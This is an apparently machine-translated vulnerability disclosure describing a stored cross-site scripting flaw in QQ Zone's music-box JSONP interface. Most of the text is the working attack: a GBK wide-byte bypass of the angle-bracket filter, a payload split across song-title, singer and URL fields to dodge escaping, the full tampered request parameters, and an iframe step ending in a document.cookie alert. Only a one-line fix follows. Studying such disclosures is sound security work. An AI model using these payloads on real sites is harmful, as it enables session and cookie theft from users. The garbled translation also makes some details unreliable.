QQ space music and storage XSS-filter? I wrap around!

Filtered <,>? Me around! Filtered ()? Me around! If you want to use/**/to comment out, even * is filtered out!
The problematic address is: http://qzone-music.qq.com/fcg-bin/fcg_music_fav_getinfo.fcg?dirinfo=1&dirid=201&uin=QQ Number & p = 0.887586027616635 & inCharset = GB2312 & outCharset = utf-32 & hostUin = & notice = 0 & needNewCode = 0 & format = jsonp & platform = musicbox & jsonpCallback = jsonCallback this address will output QQ number in the QQ space music box [I like] The music content in this album, including information such as the singer, song name, and song address. Under normal circumstances, the singer name, song name, and song address <,> will be filtered out, that is, filtered into & lt; & gt; In this step, our corresponding Bypass Method is: % bf <script/% bf> principle: the server filters out special characters in the data, but when % bf is read, % bf <is considered as a GBK character. That is, the filter program will regard the above content as: [GBK character] script/[GBK character] And then when the above content is output to the page, the content is changed to the <script/port> (the "Port" is a non-recognized character), so we inserted a <script> ----------------------------------------------------------- through the above method, we can write the following code: % bf <script/% bf> alert (1); % bf </script/% bf>. Unfortunately, after inserting this section in the song title, the discovery (,) is escaped into the form of & # xxxx. Alert cannot be executed, and the Code cannot be executed if no parentheses are used. --------------------------------------------------------------- However, we can control multiple output points. As follows: songname, singername, url songname: "Control Point 1", singerid: 0, singername: "Control Point 2", url: "Control Point 3" that is, we can use the annotation method to enter the following points: songname: "aaaaaaa", singerid: 0, singername: "port <script/port>/*", url: "*/; alert (1) //". However, * is filtered as & # xxxx. Continuing the test, we found that not only the parentheses, asterisks, connections =, +, and % are basically all filtered as long as they are symbols. Fortunately, [,],/is not filtered. In addition, we were surprised to find that the filtering rules for URLs and songname and singername are different, and so many symbols are not filtered. So: songname: "aaaaaaa", singerid: 0, singername: "port <script/port> [", url: "]; alert (1) /* "----------------------------------------------------------------- the song above completes <script> [", url: "]; alert (1 )/*.... edit the next song, modify songname, and add </script> to close the script tag. Songname: "port * // port </script/port>", singerid: 0. The specific exploitation process is written in the vulnerability proof. Vulnerability proof: Enter the "I like" directory in the QQ space music box. 1. First modify the first song, capture the package, and modify the package URL: http://qzone-music.qq.com/cgi-bin/v5/cgi_music_modsong_new?g_tk=1232408522 First package, the url and singer parameter formsender = 1 & out = 2 & from = 1 & source = 103 & uin = 8639560 & songid = 4283798478 & type = 1 & urlchanged = 1 & moodchanged = 0 & url =]; alert (1 ); /* login & songtitle = aaa & singer = % bf <script/% bf> [& dirid = 201 & desc = & inCharset = GB2312 & hostUin = 8639560 & notice = 0 & needNewCode = 0 & g_tk = 1232408522 & format = fs & platform = musicbox & outCharset = gb23122. then modify the second song, packet capture, package modification, address the same as 1, modified the songtitle parameter formsender = 1 Pipeline & songtitle = % bf * // % bf </script/% bf> & singer = % CE % D2 % C3 % C7 % B5 % C4 % B0 % AE & dirid = 201 & desc = & inCharset = GB2312 & hostUin = 8639560 & notice = 0 & needNewCode = 0 & g_tk = 1232408522 & format = fs & platform = musicbox & outCharset = gb23123. the final effect is as follows:: 4. then use iframe. <Iframe name = "alert (document. cookie)" src =" http://qzone-music.qq.com/fcg-bin/fcg_music_fav_getinfo.fcg?dirinfo=1&dirid=201&uin=QQ Number & format = jsonp & platform = musicbox & jsonpCallback = jsonCallback ">
 Solution:

Use another function or method to filter symbols.